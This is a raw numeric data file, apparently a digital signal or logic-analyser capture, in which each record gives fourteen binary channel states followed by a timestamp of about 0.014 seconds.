0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988332e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988356e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988384e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988404e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988432e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988456e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988484e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988508e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988532e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988556e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988584e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988604e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988632e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988656e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988684e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988708e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988732e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988756e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988784e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988804e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988832e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988856e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988884e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988908e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988932e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3988956e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3988984e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989004e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989032e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989056e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989084e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989108e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989132e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989156e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989184e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989204e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989232e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989256e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989284e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989308e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989332e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989356e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989384e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989404e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989432e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989456e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989484e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989508e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989532e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989556e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989584e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989604e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989632e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989656e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989684e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989708e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989732e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989756e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989784e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989804e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989832e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989856e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989884e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989908e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989936e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3989964e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3989988e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4114268e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4114480e-02 1,1,0,1,1,0,0,0,0,0,0,1,0,1,1.4114508e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4114536e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.4114820e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4114844e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,1.4114852e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,1,1.4114900e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,1.4114924e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4114932e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.4114948e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4114972e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.4114996e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4115020e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.4115044e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4115072e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,1.4115076e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115100e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4115124e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115148e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115156e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4115172e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115196e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115204e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4115248e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115272e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4115276e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115280e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4115296e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115324e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4115348e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115372e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4115396e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115420e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4115444e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115472e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115476e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4115524e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115548e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4115572e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115596e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115604e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4115648e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115672e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4115676e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115680e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4115724e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115748e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115752e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4115772e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115796e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4115820e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115844e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4115872e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4115896e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115904e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4115948e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4115972e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4115996e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116020e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116072e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116096e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116100e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4116124e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116148e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4116172e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116196e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4116220e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116244e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116252e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116300e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116324e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116328e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4116372e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116396e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116404e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116420e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116444e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116472e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116496e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116524e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116548e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116596e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116620e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116628e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4116672e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116696e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116704e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116748e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116772e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116796e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116820e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116844e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116872e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116876e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4116896e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4116924e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4116928e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116932e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4116972e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4116996e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117004e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4117020e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117044e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4117072e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117096e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4117124e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117148e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117156e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4117196e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117220e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4117248e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117272e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117276e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4117324e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117348e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117356e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4117396e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117420e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117428e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4117444e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117472e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4117496e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117524e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4117548e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117572e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117580e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4117620e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117648e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4117672e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117696e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4117748e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117772e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,1.4117776e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117780e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4117796e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117820e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117828e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4117844e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4117872e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4117896e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117924e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4117972e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4117996e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118004e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118020e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118044e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118072e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118096e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4118100e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4118124e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4118148e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118156e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118196e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118220e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4118228e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4118244e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4118268e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4118292e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4118324e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4118344e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4118372e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118376e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118420e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118444e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118468e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118492e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118524e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118544e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118572e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118596e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118620e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118644e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118692e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118720e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118744e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118772e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118796e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118820e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118844e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118868e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118892e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118920e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118944e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4118972e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4118996e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119020e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119044e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119068e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119092e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119120e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119144e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119172e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119196e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119220e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119244e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119268e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119292e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119320e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119344e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119372e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119396e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119420e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119444e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119468e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119492e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119520e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119544e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119572e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119596e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119620e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119644e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119692e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119720e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119744e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119768e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119796e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119820e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119844e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119868e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119892e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119920e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119940e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4119964e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4119992e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120024e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120052e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120076e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120100e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120124e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120148e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120172e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120200e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120224e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120252e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120276e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120300e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120324e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120348e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120372e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120400e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120424e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120452e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120476e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120500e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120524e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120548e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120572e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120600e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120624e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120652e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120676e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120700e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120724e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120748e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120772e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120800e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120824e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120852e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120876e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120900e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120924e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4120948e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4120972e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121000e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121024e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121052e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121076e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121100e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121124e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121148e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121172e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121200e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121224e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121252e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121276e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121300e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121324e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121348e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121372e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121400e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121424e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121452e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121476e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121500e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121524e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121548e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121572e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121600e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121624e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121644e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121672e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121696e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4121724e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4121748e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4246172e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.4246376e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4246396e-02 0,0,1,1,1,0,0,0,0,0,0,1,0,1,1.4246428e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4246452e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.4246740e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4246768e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,1.4246772e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,1,1.4246812e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,1.4246840e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,1,1.4246844e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4246848e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.4246860e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4246892e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.4246940e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.4246964e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.4246988e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247004e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247012e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247020e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4247060e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.4247092e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247096e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247116e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247140e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247144e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4247188e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247212e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247220e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247240e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247292e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247316e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247340e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247364e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.4247388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.4247412e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247420e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.4247468e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.4247492e-02 